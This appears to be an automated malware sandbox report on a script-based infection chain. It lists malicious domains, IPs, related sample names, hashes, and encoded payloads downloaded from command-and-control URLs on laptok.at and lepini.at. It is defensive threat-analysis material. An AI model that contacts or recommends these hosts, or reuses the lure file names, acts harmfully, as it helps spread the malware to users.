skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target mshta.exe, PID 7008 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:18:51	API Interceptor	1x Sleep call for process: wscript.exe modified
12:19:28	API Interceptor	10x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
47.241.19.44	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	earmarkavchd.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	2200.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	22.dll	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	mRT14x9OHyME.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	4N9Gt68V5bB5.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	34UO9lvsKWLW.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	csye1F5W042k.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	http://c56.lepini.at	Get hash	malicious	Browse	c56.lepini.at/
	my_presentation_82772.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	208.67.222.222
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	208.67.222.222
	earmarkavchd.dll	Get hash	malicious	Browse	208.67.222.222
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	208.67.222.222
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	208.67.222.222
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	208.67.222.222
	fY9ZC2mGfd.exe	Get hash	malicious	Browse	208.67.222.222
	H58f3VmSsk.exe	Get hash	malicious	Browse	208.67.222.222
	2200.dll	Get hash	malicious	Browse	208.67.222.222
	5faabcaa2fca6rar.dll	Get hash	malicious	Browse	208.67.222.222
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	208.67.222.222
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	208.67.222.222
	YjimyNp5ma.exe	Get hash	malicious	Browse	208.67.222.222
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	208.67.222.222
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	208.67.222.222
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	208.67.222.222
	u271020tar.dll	Get hash	malicious	Browse	208.67.222.222
	Ne3oNxfdDc.dll	Get hash	malicious	Browse	208.67.222.222
	5f7c48b110f15tiff_.dll	Get hash	malicious	Browse	208.67.222.222
	u061020png.dll	Get hash	malicious	Browse	208.67.222.222
myip.opendns.com	earmarkavchd.dll	Get hash	malicious	Browse	84.17.52.25
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	84.17.52.25
	fY9ZC2mGfd.exe	Get hash	malicious	Browse	84.17.52.40
	H58f3VmSsk.exe	Get hash	malicious	Browse	84.17.52.40
	YjimyNp5ma.exe	Get hash	malicious	Browse	84.17.52.40
	4.exe	Get hash	malicious	Browse	84.17.52.10
	PtgzM1Gd04Up.vbs	Get hash	malicious	Browse	84.17.52.10
	Win7-SecAssessment_v7.exe	Get hash	malicious	Browse	91.132.136.164
	Capasw32.dll	Get hash	malicious	Browse	84.17.52.80
	my_presentation_u6r.js	Get hash	malicious	Browse	84.17.52.22
	open_attach_k7u.js	Get hash	malicious	Browse	84.17.52.22
	ZwlegcGh.exe	Get hash	malicious	Browse	84.17.52.22
	dokument9903340.hta	Get hash	malicious	Browse	84.17.52.22
	look_attach_s0r.js	Get hash	malicious	Browse	84.17.52.22
	my_presentation_u5c.js	Get hash	malicious	Browse	84.17.52.22
	presentation_p6l.js	Get hash	malicious	Browse	84.17.52.22
	job_attach_x0d.js	Get hash	malicious	Browse	84.17.52.22
	UrsnifSample.exe	Get hash	malicious	Browse	84.17.52.78
	sample.docm	Get hash	malicious	Browse	84.17.52.78
	3289fkjsdfyu.exe	Get hash	malicious	Browse	185.189.150.37
c56.lepini.at	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	2200.dll	Get hash	malicious	Browse	47.241.19.44
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	47.241.19.44
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	47.241.19.44
	http://c56.lepini.at	Get hash	malicious	Browse	47.241.19.44
api3.lepini.at	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	2200.dll	Get hash	malicious	Browse	47.241.19.44
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	47.241.19.44
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	47.241.19.44
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	47.241.19.44
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	47.241.19.44
	9EJxhyQLyzPG.vbs	Get hash	malicious	Browse	47.241.19.44
	C4iOuBBkd5lq-beware-malware.vbs	Get hash	malicious	Browse	8.208.101.13
	PtgzM1Gd04Up.vbs	Get hash	malicious	Browse	8.208.101.13

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	https://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.com	Get hash	malicious	Browse	47.254.218.25
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	https://bit.ly/35MTO80	Get hash	malicious	Browse	8.208.98.199
	videorepair_setup_full6715.exe	Get hash	malicious	Browse	47.91.67.36
	http://banchio.com/common/imgbrowser/update/index.php	Get hash	malicious	Browse	47.241.0.4
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	1119_673423.doc	Get hash	malicious	Browse	8.208.13.158
	1118_8732615.doc	Get hash	malicious	Browse	8.208.13.158
	https://bit.ly/36uHc4k	Get hash	malicious	Browse	8.208.98.199
	https://bit.ly/2UkQfiI	Get hash	malicious	Browse	8.208.98.199
	WeTransfer File for info@nanniottavio.it .html	Get hash	malicious	Browse	47.254.218.25
	https://bit.ly/2K1UcH2	Get hash	malicious	Browse	8.208.98.199
	http://sistaqui.com/wp-content/activatedg.php?utm_source=google&utm_medium=adwords&utm_campaign=dvid	Get hash	malicious	Browse	47.254.170.17
	https://bit.ly/32NFFFf	Get hash	malicious	Browse	8.208.98.199
	https://docs.google.com/document/d/e/2PACX-1vTXjxu9U09_RHRx1i-oO2TYLCb5Uztf2wHiVVFFHq8srDJ1oKiEfPRIO7_slB-VnNS_T_Q-hOHFxFWL/pub	Get hash	malicious	Browse	47.88.17.4
	https://bit.ly/2Itre2m	Get hash	malicious	Browse	8.208.98.199

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B24C39E1-2D7D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	70760
Entropy (8bit):	2.029915725001615
Encrypted:	false
SSDEEP:	192:rBZiZBI2BNl9WBNHwtBNHpNifBNHp0aMezMBNHQF0QGc6qqBBNUQF089ptBNUQwB:rH+VxU4Egjnqty6pE2IS
MD5:	2C9E17CA8FA3B14C85503A78AF5EFFB8
SHA1:	791AD768DB828A559616E24299C4BE3C41C7582C
SHA-256:	6628C6B7F11098030CEF04B561F1A4378C916B2C35EFEE8AD52327A4D43E485C
SHA-512:	629807748AC1C7DBC541EA4D9A0FA7D58D2810F5D0B4A2E91A8D18427ADE3D14AE0A1D4F62CA8263D58D94EFE1889D5F6B1919B74B78D254D0A6BA48AD4B625D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B24C39E3-2D7D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27600
Entropy (8bit):	1.9201967726626565
Encrypted:	false
SSDEEP:	192:rBZXQT6xk7FjR92RIkWR0MRrY5D+FuOY1DPFuO9oA:rHA2i7hR0RMRhRrwDquO0D9uO5
MD5:	5A77C8785B4E875796A562A411C8C76C
SHA1:	6B483870B3D4B06DAA136B3342F289E450BBB59E
SHA-256:	849CFC21C226EEC73CE069D2D3F5F54539BBDBF022A4F587FBC0D221EFE7E135
SHA-512:	E1CDF33BC8916754C8EE323B863C90C29E971A7DD4AE6BCB604BEEBE6112DA2F564A4220090862CD62B3664FCAA607DEFD300D340D46EB9171F4D1E76DA45B21
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B24C39E5-2D7D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28172
Entropy (8bit):	1.929205872343585
Encrypted:	false
SSDEEP:	192:ryZOQa6Uk/Fj52QkWOMpYtmidFleid2uA:ruLF5/hIUnpkmofeo2J
MD5:	551529A636FC7AEDB6C5D04CE1D14C45
SHA1:	C1CA39149400D9D4FF7623B564D682BD20F5BA85
SHA-256:	C2965E36A51DE23F8F27E13DCFFC7D2BB85FE744FB263C237CF438961DB77F5D
SHA-512:	A61B7969E5131AB50BE48D710EA64BB80E742726CFBADD3E8F4DFA9706948200345E3D081A4E21902FE2D586C038FEDD705CDCE58ACA879564FED16822682FEB
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B9675AD6-2D7D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27728
Entropy (8bit):	1.9406359464322147
Encrypted:	false
SSDEEP:	192:r3ZcQf6hk6Fj524kWaMtY5TPtrYxG1TPXPtrYxf9A:rp1SS6hI8btwTGcTPGpu
MD5:	FA98A5F165973053EDE4F517DB598191
SHA1:	A8852B04837CBDA495CF390292237092CA83980A
SHA-256:	0D406930D2FBF5F26164FEE24EF8E18E33A0E8FF89557132778AEE38A2F077EC
SHA-512:	0B0CC4C6E606A5D93EFAB6C2BE54E8924B513E747EE9EDF01FCB2850C0855AB0D7879D18C84A29A818DABBDF8AEF94A057DAE8F8B2A965FE23CCDFA276926642
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\j[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	267692
Entropy (8bit):	5.9998318720132415
Encrypted:	false
SSDEEP:	6144:44O5Y0gENNNqfVNhLk80e90l74eSNzOKGDXlGkW:44OCGcfdLk2eZTozwD8
MD5:	A512480796AAC276DE075C8246DEBFAD
SHA1:	7ABAD97BA1DDE2DE12AE13D8B073DD62052DEBCB
SHA-256:	69F5D4AAF530E735560A17E4D9D448F3919FD2C2225A4D01ACD7F5314FC01A25
SHA-512:	8C2D88DBA729FBC2B3A25276DA1D39794CF87EA1477669FBC3F5FA6E2E77A1BEEFEEA2729E6FE21FF9377A9F0F57D1A9F9C4C1AA45B3F636F81B97EC81389D66
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j
Preview:	MXaT+k4mMtUL9eYPx2IlrpVm5upz2PvttLY1qPTY4E7P0iDWMDKUVrMLiWZRLRvv8fPCCk6Ab4dOGpRrKXx4Ox+lZsGcH+jO4f/CbnbUm2cmRY8W1BOz/uHPM/rJ8s4fjc9nWX/FmHC6pFi4dD1tx/NICJ35i3MPfBpSA4GY64F0Ur3KeEfrclI0BzeGwF3qA7fuEEV1m+kR0nqrlJm/BuUQeINp57klIcOxWWjV2ydNiRGATvFjJNuQhVgJfmqRRhcVhr9xngUX46tyJNRjZg8mgsm2m/4VqELy7yPhsqdPmlKQqjWNIAV8Irw8JMW+kVEQU3ydu6VcxfXll6Y6gcCm7PTQc2b9bjA2CDJIV5JhuN7gwUm9hjJOiexpiqjlpgqYgdJYuQ1s3Xxm9wFaH+QHK8Mdi+00b27kP95+ShYR5jGL7sI/es25tH74WYMMnUJcxMVKbiMdPJwpw8qXwFabtH3NRNY7zPxXhnaYzQYdSI7ousMyu87rR9HPZm6eOw9yzTW9qZlUNSZ11gAHiL8OibrLhAlnNzv85wNllktyqBSvPha3Mr+mIQlPGfNfpVVEAAQZzPZTRigtxJMTriCNHAI8anMKk9+jBYR48GNMTcA7jcUG3UkA8f1Ky/0fU4/E53kH8jjCss9FJe502wloYjbNRdxu6eia/0Mmg9uNi6UMD3uB4WHJqRqXuYIIdQhOa1pnOwSK6UiSsIMkT/aD2g1AoAjnbzFhdnn4y66JzdHsRG3lY03SwDpsxuddvjfg4eX0RVcXlJgvP6SNUnAVzzVtsSp3fKeX8r/O+0kIgjEOhoX9aHB0aS4uk2+lShYKR/LjHsZ46HdY3gu1BXC9XKdSDvf1sFERSKj4fxM6KwhtAWh9rgVrVZpFwAZBGTlXS5RQK7oWxPu0y4piw26SHKllj2TnMNiEDk3/v6cMtKz4bSo8e3RSVtnqrmcBCxak/8abhsddRrj4IStq2/bo1Fa6PLwpkP/iK13A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Gfdfp[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2400
Entropy (8bit):	5.982959048236587
Encrypted:	false
SSDEEP:	48:BXb1tWWNj65eUdL8F8AvD/5skoHa3NBMO9YcQuOa/LEQd5W5Wu+8:ntWWF65ng9Dh0H8MO8lOzu+8
MD5:	29F9204F23026C595F6E2A549DB446C7
SHA1:	B81892FDF6C46415746B10D79B1099930D2BD2F5
SHA-256:	73F4F79CCED31F9B899FDCF1C2CAF1D66613538B1719A4E8A80DEEBB71D81206
SHA-512:	C008854797984179456066FF68CBFC8F732F510965D9B2069BC6CEF9DB99DD59EC908DAFC9889CD08B8357418982A3DD89983FA51585CDD24E5C2E4CC91E457A
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp
Preview:	qnbw7POhhOvWjjjOoG705V/fzFquo/6TJPkGufCBViPPHYw55tv+iPpog1ePIaLT0HKsQB8qAmPZ0MiJADiJcRoWVwHAJQw0LkECJ0oaLCf/aZXECKxTkdXfDZueEqbOhezEKnTdfYj2L/LJDvzAZbctz2naqnFPj1IEkftRefEsvKdEuldhCABq1AGUflOp6MmTvCJaq4chtUC9Q8TwT7ahrqTh0MJ48eFyAdn7hXUVhNjz3C0ALJRqKJgziL82FBmBQeDLHLDczTAOUgOHM8sk41FtWMqc4NycQEME4fh+7oo53vtg225JXxDFV2hFe5veSIXDLS8Ke4ewsJfxNbAV8AFcH/tKKTFkrvHEuT7hYBHnHmRc7dg3GAAwzCaOEHNAau7mx0fFSJBNf1CFj+PB26dijy/iLHhBV+K6iKD8fpPCWHhb4eBNDNOn04K4zLsNBIxRv/SqM4ESXekTLMXpJtDEuEzVagnSfqktIiVMsuqa8qYAJOqZKg+gC0/6OF2Y8uupSAWDcScgIRf5E7UO1vkq6qClMabAHe/a85jh2O8ibFC3u6tcDL+aqTIBPEFTga8I+uY8CjCy7Go1zYp4hZ7y4OJ6DuPIWyVht6cmf0/NDsLuU39926u3AGjazazlwVotJNsIzccLPdi29U9K2ntBTR39EIqs6oI8XQmHKCknA8PmuvIVZtqobBE641+EHJ4VhoviofiY7UidXF778dMaV2Qc0pL3eQ68/yRL4o7jNzOVkEfvDBD6tB2I9pmK6EYcCbS79sLqmlUhqQJy8EozM1ehgYRv4wBq+/4kt5PY6+7LNXi7b0bCYiqss7CE9J6DaJSfyl3CvQqSUuaA0PZ5CnwQwcSTQoZii1ehbPX0XtZXUrrellZAKzpZGHdTH1yljq7sAn5ZquHKV9hDcJHgoOyHBomJwKwQaIO2hcfbsOiiQQnbnyU4zLYohcnvCwUMANUZFIIKs/Zhx4j3SI0ibvqzQAyzdDnH

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\k[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	338028
Entropy (8bit):	5.999918695533632
Encrypted:	false
SSDEEP:	6144:Zf73p9f6HTHAOHur1/xOZS83M6FWYbK9/gf14nNWiqSoEbMTozy5KlBuRTq:J3pegmy1pgxEYmBcmSSdbMM4RTq
MD5:	74C0FF61806856E0601DBEC941DA624D
SHA1:	85A8DDE4E0C6ACA4247B6F0321EB901DFB0C34AE
SHA-256:	3FE5D931BAEE5A2117E7AA9D0805F9F0DE486C29F4AC62280B86FC420B6B2E80
SHA-512:	D7A87C04BD103A4C7E5E4716C78B442BF7E5B0292A3D68A382D9E2887DA7D18E8733AC07E47D445FE82A5382D5AA96B71293FF8F7E5617513A64AB19A485F8EB
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k
Preview:	lm4aq8LsZ0CnjuSc7Kzqzdla3RDwkISvh5jIeC2xM5lIiA25vQGqGNFBAkO7XVxTu37lbn5TzqG8DYdBOuuW7FWsFpHJ96ctPhP/6QiItWVmSSWkmle3Bulr+d43yR0oqFk0LtY/Co2i+5RdlZHc9io/UaZllz1DnVUE9FpxBzj0azOjdJIvVxENnYdyqL6e8Mpu5SiTJvhRMcsX7zDgi4Cs/YsAa/oGKbobNc73ANj+Gw9RzAdgYr2/b+c6xAovnAoG8GV4gFwZaMc7SGZhcRrzj3eo/PPWc4Gqd8XUJk9OHO9ZhnEQ+MlD4vJMlpR6102FVBHvP0dBExvvzbDlXRj1bqQtl2yPCP5vMPKk6vNAkEqpDJM3VlO7a+rnTSmmg92EAZyu0+HCV3QW9z0tMNqG0ZYm4BKB4ZWbGOiCbpdvA1uZNfPp/Y8WP078mWtKzt+mV62A0K+b1s64nYJ3hEYWx8VFnf3bq5Auhfaxot2jlsdz81zti6vjRd5JUCdg/1aXqTG1CT5Df0qoAg9bicHSVkNFIOuQZoLfLQITbLcUVUZQ9bV4SDaTOm3pZvGFZwzObDgmByiFbFbZTAm1Gdu/DDm8g6J+Lt6Bz83sDKKiurg3fgFegiJWMuUwEoFPdbfOLCuuqNZC+02IDTYrX4+jEqZ6ov+AHbWoZBYYlBj5Qal/xaGe5vzFpCRNl9Hupyeuy+gM+3zLJITSk6HEMeVOOS1ZA2pLU+Gx6JcKiB/rqlhSu4KXU/EX3tf9kS8/UBy2ruoVttVF3IwMG4stVLe9qRFpzWyhq2mvdEFdsdZ+wMGx3yK7UPF6ZLE0/6H+nWd0ZgPHN9TFzKA0zZuW+//WQdBA1YX6si+t3sFJ5q6Z8QUUEuufs2JEPVZJjEUAvgBRiC9GmCxFVc/tXbnU3EjpoRVvm9QRvt+JjeZLgpTyztTDiXNHpyNa6aL2duvEESfeW4+TQz4kvOUSsgtR3VjI539sSOOcb42I7waP

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.8910535897909355
Encrypted:	false
SSDEEP:	192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
MD5:	7A57D8959BFD0B97B364F902ACD60F90
SHA1:	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
SHA-256:	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
SHA-512:	83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
Malicious:	false
Preview:	PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	5.325275554903011
Encrypted:	false
SSDEEP:	24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdi5:qEPerB4nqRL/HvFe9t4CvpBfui5
MD5:	C85C42A32E22DE29393FCCCCF3BBA96E
SHA1:	EAF3755C63061C96400536041D4F4EB8BC66E99E
SHA-256:	9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
SHA-512:	7708F8C2F4A6B362E35CED939F87B1232F19E16F191A67E29A00E6BB3CDCE89299E9A8D7129C3DFBF39C2B0EBAF160A8455D520D5BFB9619E4CDA5CC9BDCF550
Malicious:	false
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\404E.bi1 Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	112
Entropy (8bit):	4.48992345445028
Encrypted:	false
SSDEEP:	3:cPLgeqnhARtt7TSjjhThARtn6an:o0eqnWbtChWbn6a
MD5:	1784914AE468F35A55BBAF2A8D746D04
SHA1:	7959C412D18BEBCE89AF9DC3715AA17A703467B1
SHA-256:	E32BFF5542AF45D88A381F1F0239906ACC07E086FD4F93D9A057A70D48DF4E1A
SHA-512:	CD36A88A3E8E5D11B606B65A72070FD1A60960ED7D4CC0713274039E328038FD129FC57DD806A8F66D2A82E9AF18304E7E39E494A75ECD3B40CA7EA6EE3D688C
Malicious:	false
Preview:	Server: resolver1.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 84.17.52.25....

C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	402
Entropy (8bit):	5.038590946267481
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
MD5:	D318CFA6F0AA6A796C421A261F345F96
SHA1:	8CC7A3E861751CD586D810AB0747F9C909E7F051
SHA-256:	F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
SHA-512:	10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
Malicious:	false
